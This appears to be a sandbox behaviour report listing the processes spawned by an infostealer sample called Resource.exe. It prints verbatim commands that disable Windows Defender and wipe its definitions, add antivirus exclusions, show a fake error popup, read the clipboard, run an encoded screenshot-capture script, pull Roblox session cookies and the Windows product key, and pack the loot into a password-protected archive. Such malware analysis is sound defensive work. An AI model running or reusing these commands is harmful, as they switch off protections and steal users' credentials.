Source: Resource.exe	String found in binary or memory: when smaller code objects and pyc files are desired as well as suppressing the extra visual location indicators when the interpreter displays tracebacks. These variables have equivalent command-line parameters (see --help for details): PYTHONDEBUG
Source: Resource.exe	String found in binary or memory: can't send non-None value to a just-started generator

Source: C:\Users\user\Desktop\Resource.exe

File read: C:\Users\user\Desktop\Resource.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Resource.exe "C:\Users\user\Desktop\Resource.exe"
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Users\user\Desktop\Resource.exe "C:\Users\user\Desktop\Resource.exe"
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'"
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Cannot run with your windows version', 0, 'Error', 0+16);close()""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Cannot run with your windows version', 0, 'Error', 0+16);close()"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\Resource.exe""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\Resource.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr'
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB5E2.tmp" "c:\Users\user\AppData\Local\Temp\erdw4v5g\CSCD6B8C8C98EAE4A66B46BEA9E417699A.TMP"
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
